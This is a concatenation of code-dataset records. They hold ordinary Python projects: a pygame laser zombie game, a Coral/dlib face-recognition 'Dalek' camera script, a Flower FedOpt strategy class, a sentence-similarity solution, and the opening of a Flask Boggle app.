tutorial_timer > 0:\n draw_tutorial()\n if tutorial_timer == 0:\n first_time = False\n tutorial_timer -= 1\n\n score_text = font_score.render(str(score), False, WHITE)\n screen.blit(score_text, (30, 1))\n\n main1.draw()\n main2.draw()\n\n main1.move(one_moving_left, one_moving_right, one_moving_up, one_moving_down)\n main2.move(two_moving_left, two_moving_right, two_moving_up, two_moving_down)\n\n laser = pygame.draw.line(screen, WHITE, (main1.rect.centerx + 12, main1.rect.centery + 10), (main2.rect.centerx - 25, main2.rect.centery + 10), 6)\n\n\n # Zombie(x, y, scale, speed)\n if zombie_timer == max_zombie_timer:\n # za koliko ce enemy biti spawnan van ekrana = 10\n ran = random.randint(1, 4)\n if ran == 1:\n zombie = Zombie((SCREEN_WIDTH + 10), (random.randint(0, SCREEN_HEIGHT)), 0.8, 1)\n if ran == 2:\n zombie = Zombie((random.randint(0, SCREEN_WIDTH)), (-10), 0.8, 1)\n if ran == 3:\n zombie = Zombie((SCREEN_WIDTH - 10), (random.randint(0, SCREEN_HEIGHT)), 0.8, 1)\n if ran == 4:\n zombie = Zombie((random.randint(0, SCREEN_WIDTH)), (SCREEN_HEIGHT + 10), 0.8, 1)\n zombie_group.add(zombie)\n max_zombie_timer -= 10\n zombie_timer = 0\n zombie_timer += 1\n\n zombie_group.draw(screen)\n for zombie in zombie_group:\n zombie.move()\n zombie.draw()\n if laser.collidepoint(zombie.rect.center) and distance_point_line(zombie.rect.center, main1.rect.center,\n main2.rect.center) < 10:\n laser_sfx.play(1, 0, 0)\n zombie.kill()\n setScore()\n score += 1\n\n # quit\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n\n # keyboard presses\n\n if event.type == pygame.KEYDOWN:\n # movement\n if event.key == pygame.K_a:\n one_moving_left = True\n if event.key == pygame.K_d:\n one_moving_right = True\n if event.key == pygame.K_w:\n one_moving_up = True\n if event.key == pygame.K_s:\n one_moving_down = True\n\n if event.key == pygame.K_LEFT:\n two_moving_left = True\n if event.key == pygame.K_RIGHT:\n two_moving_right = True\n if event.key == pygame.K_UP:\n two_moving_up = True\n if event.key == pygame.K_DOWN:\n two_moving_down = True\n\n if event.key == pygame.K_ESCAPE:\n pause()\n\n if event.type == pygame.KEYUP:\n # -movement\n if event.key == pygame.K_a:\n one_moving_left = False\n if event.key == pygame.K_d:\n one_moving_right = False\n if event.key == pygame.K_w:\n one_moving_up = False\n if event.key == pygame.K_s:\n one_moving_down = False\n\n if event.key == pygame.K_LEFT:\n two_moving_left = False\n if event.key == pygame.K_RIGHT:\n two_moving_right = False\n if event.key == pygame.K_UP:\n two_moving_up = False\n if event.key == pygame.K_DOWN:\n two_moving_down = False\n\n pygame.display.update()\n\ndef main_menu():\n main_menu_music.play(-1, 0, 0)\n button_play = pygame.image.load('ui/button_play.png')\n button_play_hover = pygame.image.load('ui/button_play_hover.png')\n button_exit = pygame.image.load('ui/button_exit.png')\n button_exit_hover = pygame.image.load('ui/button_exit_hover.png')\n while True:\n clock.tick(FPS)\n draw_bg()\n global click, musicB\n\n mx, my = pygame.mouse.get_pos()\n\n logo = pygame.image.load('misc/logo.png')\n screen.blit(logo, (100, 200))\n\n screen.blit(button_play, (100, 400))\n button_play_rect = pygame.Rect(100, 400, 350, 100)\n if button_play_rect.collidepoint((mx, my)):\n screen.blit(button_play_hover, (100, 400))\n if click:\n main_menu_music.fadeout(2000)\n fade(SCREEN_WIDTH, SCREEN_HEIGHT, button_play, button_exit, logo)\n game()\n screen.blit(button_exit, (550, 400))\n button_exit_rect = pygame.Rect(550, 400, 350, 100)\n if button_exit_rect.collidepoint((mx, my)):\n screen.blit(button_exit_hover, (550, 400))\n if click:\n pygame.quit()\n sys.exit()\n click = False\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if event.button == 1:\n click = True\n\n pygame.display.update()\n\n\nmain_menu()", "repo_name": "Rijad-Ismailovic/Laser-Bound", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 15487, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pygame.init", "line_number": 6, "usage_type": "call"}, {"api_name": "pygame.mixer.init", "line_number": 7, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 7, "usage_type": "name"}, {"api_name": "pygame.font.init", "line_number": 8, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 14, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pygame.display.set_icon", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 23, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 23, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 24, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 25, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 25, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 28, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 31, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 31, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 33, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 37, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 37, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 38, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 39, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 39, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 42, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 42, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 43, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 43, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 57, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 63, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 64, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 64, "usage_type": "attribute"}, {"api_name": "math.pi", "line_number": 98, "usage_type": "attribute"}, {"api_name": "math.atan2", "line_number": 98, "usage_type": "call"}, {"api_name": "pygame.transform.rotozoom", "line_number": 100, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 100, "usage_type": "attribute"}, {"api_name": "pygame.transform.rotozoom", "line_number": 103, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 103, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 108, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Sprite.__init__", "line_number": 110, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 110, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 113, "usage_type": "call"}, {"api_name": "pygame.image.load", "line_number": 116, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 116, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 117, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 117, "usage_type": "attribute"}, {"api_name": "math.pi", "line_number": 151, "usage_type": "attribute"}, {"api_name": "math.atan2", "line_number": 151, "usage_type": "call"}, {"api_name": "pygame.transform.rotozoom", "line_number": 152, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 152, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 161, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 161, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 162, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 162, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 163, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 163, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 164, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 164, "usage_type": "attribute"}, {"api_name": "pygame.math.Vector2", "line_number": 169, "usage_type": "call"}, {"api_name": "pygame.math", "line_number": 169, "usage_type": "attribute"}, {"api_name": "pygame.math.Vector2", "line_number": 170, "usage_type": "call"}, {"api_name": "pygame.math", "line_number": 170, "usage_type": "attribute"}, {"api_name": "pygame.math.Vector2", "line_number": 171, "usage_type": "call"}, {"api_name": "pygame.math", "line_number": 171, "usage_type": "attribute"}, {"api_name": "pygame.Surface", "line_number": 176, "usage_type": "call"}, {"api_name": "pygame.display.update", "line_number": 185, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 185, "usage_type": "attribute"}, {"api_name": "pygame.time.delay", "line_number": 186, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 186, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 191, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 191, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 192, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 192, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 193, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 193, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 194, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 194, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 195, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 195, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 205, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 205, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 208, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 216, "usage_type": "call"}, {"api_name": "pygame.exit", "line_number": 220, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 221, "usage_type": "call"}, {"api_name": "pygame.event.get", "line_number": 224, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 224, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 225, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 226, "usage_type": "call"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 227, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 231, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 231, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 239, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 239, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 246, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 246, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 247, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 248, "usage_type": "call"}, {"api_name": "pygame.KEYDOWN", "line_number": 250, "usage_type": "attribute"}, {"api_name": "pygame.K_ESCAPE", "line_number": 251, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 261, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 261, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 265, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 265, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 287, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 287, "usage_type": "attribute"}, {"api_name": "pygame.draw.line", "line_number": 346, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 346, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 352, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 354, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 356, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 358, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 360, "usage_type": "call"}, {"api_name": "pygame.event.get", "line_number": 378, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 378, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 379, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 380, "usage_type": "call"}, {"api_name": "pygame.KEYDOWN", "line_number": 384, "usage_type": "attribute"}, {"api_name": "pygame.K_a", "line_number": 386, "usage_type": "attribute"}, {"api_name": "pygame.K_d", "line_number": 388, "usage_type": "attribute"}, {"api_name": "pygame.K_w", "line_number": 390, "usage_type": "attribute"}, {"api_name": "pygame.K_s", "line_number": 392, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 395, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 397, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 399, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 401, "usage_type": "attribute"}, {"api_name": "pygame.K_ESCAPE", "line_number": 404, "usage_type": "attribute"}, {"api_name": "pygame.KEYUP", "line_number": 407, "usage_type": "attribute"}, {"api_name": "pygame.K_a", "line_number": 409, "usage_type": "attribute"}, {"api_name": "pygame.K_d", "line_number": 411, "usage_type": "attribute"}, {"api_name": "pygame.K_w", "line_number": 413, "usage_type": "attribute"}, {"api_name": "pygame.K_s", "line_number": 415, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 418, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 420, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 422, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 424, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 427, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 427, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 431, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 431, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 432, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 432, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 433, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 433, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 434, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 434, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 440, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 440, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 442, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 442, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 446, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 454, "usage_type": "call"}, {"api_name": "pygame.quit", "line_number": 458, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 459, "usage_type": "call"}, {"api_name": "pygame.event.get", "line_number": 462, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 462, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 463, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 464, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 465, "usage_type": "call"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 466, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 470, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 470, "usage_type": "attribute"}]} +{"seq_id": "34839705788", "text": "import time\nimport sys\nimport argparse\n\n# import image and DL processing\nimport cv2\nimport numpy as np\nimport dlib\nfrom random import randrange\n# from edgetpu.detection.engine import DetectionEngine\nfrom pycoral.adapters import common\nfrom pycoral.adapters import detect\nfrom pycoral.utils.edgetpu import make_interpreter\nfrom scipy.interpolate import UnivariateSpline\n\nfrom imutils.video import VideoStream\nfrom PIL import Image, ImageDraw\n\n# import local helper classes\nfrom faceextractor import FaceDataExtractor\nfrom recognizer import FaceRecognizer\n\n# construct the argument parser and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-o\", \"--output\", default=False, action=\"store_true\",\n\thelp=\"Display dalek PoV\")\nap.add_argument(\"-f\", \"--face\", type=float, default=0.7,\n\thelp=\"Face detection certainty\")\nap.add_argument(\"-r\", \"--recognize\", type=float, default=0.7,\n\thelp=\"Face recognition certainty\")\nargs = vars(ap.parse_args())\n\nprint(args)\n\nprint(\"Loading face detection engine...\")\ninterpreter = make_interpreter(\"/home/pi/coral-dalek/mobilenet_ssd_v2_face_quant_postprocess_edgetpu.tflite\")\ninterpreter.allocate_tensors()\n\nprint(\"Loading face landmark detection engine...\")\nshape_pred = dlib.shape_predictor(\"./shape_predictor_5_face_landmarks.dat\")\nface_ext = FaceDataExtractor()\nprint(\"Loading face recognitn engine...\")\nfacerec = dlib.face_recognition_model_v1(\"./dlib_face_recognition_resnet_model_v1.dat\")\nface_recog = FaceRecognizer()\n\n# https://www.askaswiss.com/2016/02/how-to-manipulate-color-temperature-opencv-python.html\n\nif args['output']:\n pov = 0\n overlay=[]\n overlay.append(cv2.imread('dalekpov-a.png'))\n overlay.append(cv2.imread('dalekpov-b.png'))\n overlay.append(cv2.imread('dalekpov-c.png'))\n\n def create_transform(x, y):\n spl = UnivariateSpline(x, y)\n return spl(range(256))\n\n inc_col = create_transform([0, 64, 128, 192, 256],[150, 175, 200, 225, 256])\n dec_col = create_transform([0, 64, 128, 192, 256],[28, 64, 90, 110, 128])\n\nprint(\"Starting video capture\")\n\nvc = cv2.VideoCapture(0)\nif not vc.isOpened():\n print(\"Cannot open USB camera.\")\n exit()\n\ncap_width = vc.get(cv2.CAP_PROP_FRAME_WIDTH)\ncap_height = vc.get(cv2.CAP_PROP_FRAME_HEIGHT)\ncap_fps = vc.get(cv2.CAP_PROP_FPS)\nprint(cap_width,\" x \", cap_height,\" @ \", cap_fps)\n\nprint(\"Entering main loop, press CTRL+C to exit...\")\nwhile True:\n try:\n ret, frame = vc.read()\n if not ret:\n print(\"No frame received from camera; exiting...\")\n break\n # Convert frame from color_coverted = cv2.cvtColor(opencv_image, cv2.COLOR_BGR2RGB)\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n image = Image.fromarray(frame)\n _, scale = common.set_resized_input(\n interpreter, image.size, lambda size: image.resize(size, Image.ANTIALIAS))\n interpreter.invoke()\n face_box_list = detect.get_objects(interpreter, args['face'], scale)\n\n draw = ImageDraw.Draw(image)\n for face in face_box_list:\n bbox = face.bbox\n draw.rectangle([(bbox.xmin, bbox.ymin), (bbox.xmax, bbox.ymax)], outline='black')\n box = dlib.rectangle(left = bbox.xmin,\n right = bbox.xmax,\n top = bbox.ymin,\n bottom = bbox.ymax)\n shape = shape_pred(frame, box)\n if shape:\n face_chip_img = dlib.get_face_chip(frame, shape)\n face_descriptor = facerec.compute_face_descriptor(face_chip_img)\n name = face_recog.recognize_face(face_descriptor, threshold = args['recognize'])\n if name:\n if output:\n draw.text((bbox.xmin, bbox.ymin - 20), name, fill='black')\n else:\n print(name)\n \n if args['output']:\n displayImage = np.asarray(image)\n blue, green, red = cv2.split(displayImage)\n red = cv2.LUT(red, dec_col).astype(np.uint8)\n blue = cv2.LUT(blue, dec_col).astype(np.uint8)\n green = cv2.LUT(green, inc_col).astype(np.uint8)\n displayImage = cv2.merge((red, green, blue))\n\n # displayImage = cv2.cvtColor(displayImage, cv2.COLOR_BGR2GRAY)\n if (randrange(10) > 6): pov = randrange(3)\n displayImage = cv2.addWeighted(displayImage,0.8,overlay[pov],0.2,0)\n cv2.imshow('Dalek Fry Eyestalk PoV', displayImage)\n if cv2.waitKey(1) == ord('q'):\n raise KeyboardInterrupt\n except KeyboardInterrupt:\n vc.release()\n cv2.destroyAllWindows()\n print(\"Program halted by CTRL+C\")\n sys.exit(0)", "repo_name": "hopkira/coral-dalek", "sub_path": "new_vision.py", "file_name": "new_vision.py", "file_ext": "py", "file_size_in_byte": 4719, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 24, "usage_type": "call"}, {"api_name": "pycoral.utils.edgetpu.make_interpreter", "line_number": 36, "usage_type": "call"}, {"api_name": "dlib.shape_predictor", "line_number": 40, "usage_type": "call"}, {"api_name": "faceextractor.FaceDataExtractor", "line_number": 41, "usage_type": "call"}, {"api_name": "dlib.face_recognition_model_v1", "line_number": 43, "usage_type": "call"}, {"api_name": "recognizer.FaceRecognizer", "line_number": 44, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 51, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 52, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 53, "usage_type": "call"}, {"api_name": "scipy.interpolate.UnivariateSpline", "line_number": 56, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 64, "usage_type": "call"}, {"api_name": "cv2.CAP_PROP_FRAME_WIDTH", "line_number": 69, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FRAME_HEIGHT", "line_number": 70, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FPS", "line_number": 71, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 82, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 82, "usage_type": "attribute"}, {"api_name": "PIL.Image.fromarray", "line_number": 83, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 83, "usage_type": "name"}, {"api_name": "pycoral.adapters.common.set_resized_input", "line_number": 84, "usage_type": "call"}, {"api_name": "pycoral.adapters.common", "line_number": 84, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 85, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 85, "usage_type": "name"}, {"api_name": "pycoral.adapters.detect.get_objects", "line_number": 87, "usage_type": "call"}, {"api_name": "pycoral.adapters.detect", "line_number": 87, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 89, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 89, "usage_type": "name"}, {"api_name": "dlib.rectangle", "line_number": 93, "usage_type": "call"}, {"api_name": "dlib.get_face_chip", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 109, "usage_type": "call"}, {"api_name": "cv2.split", "line_number": 110, "usage_type": "call"}, {"api_name": "cv2.LUT", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 111, "usage_type": "attribute"}, {"api_name": "cv2.LUT", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 112, "usage_type": "attribute"}, {"api_name": "cv2.LUT", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 113, "usage_type": "attribute"}, {"api_name": "cv2.merge", "line_number": 114, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 117, "usage_type": "call"}, {"api_name": "cv2.addWeighted", "line_number": 118, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 119, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 120, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 124, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 126, "usage_type": "call"}]} +{"seq_id": "3927966183", "text": "# ! This code has been copied from https://github.com/adap/flower/blob/main/src/py/flwr/server/strategy/fedopt.py commit 59a32d5\n# and removed the annoying requirement of having to pass the initialized model at construction time\n\nfrom tkinter import E\nfrom typing import Callable, Dict, Optional, Tuple\n\nfrom flwr.common import Parameters, Scalar, Weights, parameters_to_weights\n\nfrom flwr.server.strategy import FedAvg\n\nimport pickle\n\nclass FedOpt(FedAvg):\n \"\"\"Configurable FedAdagrad strategy implementation.\"\"\"\n\n # pylint: disable=too-many-arguments,too-many-instance-attributes,too-many-locals\n def __init__(\n self,\n *,\n fraction_fit: float = 0.1,\n fraction_eval: float = 0.1,\n min_fit_clients: int = 2,\n min_eval_clients: int = 2,\n min_available_clients: int = 2,\n eval_fn: Optional[\n Callable[[Weights], Optional[Tuple[float, Dict[str, Scalar]]]]\n ] = None,\n on_fit_config_fn: Optional[Callable[[int], Dict[str, Scalar]]] = None,\n on_evaluate_config_fn: Optional[Callable[[int], Dict[str, Scalar]]] = None,\n accept_failures: bool = True,\n initial_parameters: Parameters,\n eta: float = 1e-1,\n eta_l: float = 1e-1,\n beta_1: float = 0.0,\n beta_2: float = 0.0,\n tau: float = 1e-9,\n ) -> None:\n \"\"\"Federated Optim strategy interface.\n Implementation based on https://arxiv.org/abs/2003.00295\n Args:\n fraction_fit (float, optional): Fraction of clients used during\n training. Defaults to 0.1.\n fraction_eval (float, optional): Fraction of clients used during\n validation. Defaults to 0.1.\n min_fit_clients (int, optional): Minimum number of clients used\n during training. Defaults to 2.\n min_eval_clients (int, optional): Minimum number of clients used\n during validation. Defaults to 2.\n min_available_clients (int, optional): Minimum number of total\n clients in the system. Defaults to 2.\n eval_fn (Callable[[Weights], Optional[Tuple[float, float]]], optional):\n Function used for validation. Defaults to None.\n on_fit_config_fn (Callable[[int], Dict[str, str]], optional):\n Function used to configure training. Defaults to None.\n on_evaluate_config_fn (Callable[[int], Dict[str, str]], optional):\n Function used to configure validation. Defaults to None.\n accept_failures (bool, optional): Whether or not accept rounds\n containing failures. Defaults to True.\n initial_parameters (Parameters): Initial set of parameters from the server.\n eta (float, optional): Server-side learning rate. Defaults to 1e-1.\n eta_l (float, optional): Client-side learning rate. Defaults to 1e-1.\n beta_1 (float, optional): Momentum parameter. Defaults to 0.0.\n beta_2 (float, optional): Second moment parameter. Defaults to 0.0.\n tau (float, optional): Controls the algorithm's degree of adaptability.\n Defaults to 1e-9.\n \"\"\"\n super().__init__(\n fraction_fit=fraction_fit,\n fraction_eval=fraction_eval,\n min_fit_clients=min_fit_clients,\n min_eval_clients=min_eval_clients,\n min_available_clients=min_available_clients,\n eval_fn=eval_fn,\n on_fit_config_fn=on_fit_config_fn,\n on_evaluate_config_fn=on_evaluate_config_fn,\n accept_failures=accept_failures,\n initial_parameters=initial_parameters,\n )\n\n if initial_parameters:\n self.current_weights = parameters_to_weights(initial_parameters)\n else:\n self.current_weights = None\n # ! this will trigger a crash if the user doesn't copy the sever weights before the 1st round begin\n print('type of current weights:',type(self.current_weights))\n self.eta = eta\n self.eta_l = eta_l\n self.tau = tau\n self.beta_1 = beta_1\n self.beta_2 = beta_2\n\n def __repr__(self) -> str:\n rep = f\"FedOpt(accept_failures={self.accept_failures})\"\n return rep", "repo_name": "royson/fedl2p", "sub_path": "src/server/strategies/fedopt.py", "file_name": "fedopt.py", "file_ext": "py", "file_size_in_byte": 4285, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flwr.server.strategy.FedAvg", "line_number": 13, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 26, "usage_type": "name"}, {"api_name": "flwr.common.Weights", "line_number": 26, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 26, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 26, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 26, "usage_type": "name"}, {"api_name": "flwr.common.Scalar", "line_number": 26, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 28, "usage_type": "name"}, {"api_name": "flwr.common.Scalar", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 29, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 29, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 29, "usage_type": "name"}, {"api_name": "flwr.common.Scalar", "line_number": 29, "usage_type": "name"}, {"api_name": "flwr.common.Parameters", "line_number": 31, "usage_type": "name"}, {"api_name": "flwr.common.parameters_to_weights", "line_number": 81, "usage_type": "call"}]} +{"seq_id": "5378424986", "text": "from collections import defaultdict\n\nclass SentenceSimilarity:\n def areSentencesSimilar(self, words1: 'List[str]', words2: 'List[str]', pairs: 'List[List[str]]') -> bool:\n if len(words1) != len(words2): return False\n p_dict = defaultdict(set)\n for p1, p2 in pairs:\n p_dict[p1].add(p2)\n p_dict[p2].add(p1)\n for i in range(len(words1)):\n if words1[i] == words2[i] or\\\n (words1[i] in p_dict and words2[i] in p_dict[words1[i]]):\n continue\n return False\n return True\n", "repo_name": "yokolet/tranquil-beach-python", "sub_path": "tranquil-beach/sorting_searching/sentence_similarity.py", "file_name": "sentence_similarity.py", "file_ext": "py", "file_size_in_byte": 574, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.defaultdict", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "71517699048", "text": "from flask import Flask, request, render_template, redirect, flash, session, jsonify\n# from flask_debugtoolbar import DebugToolbarExtension\n\nfrom boggle import Boggle\n\nboggle_game = Boggle()\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'folke'\n\n# debug = DebugToolbarExtension(app)\n\n@app.route('/')\ndef start_game():\n \"\"\" 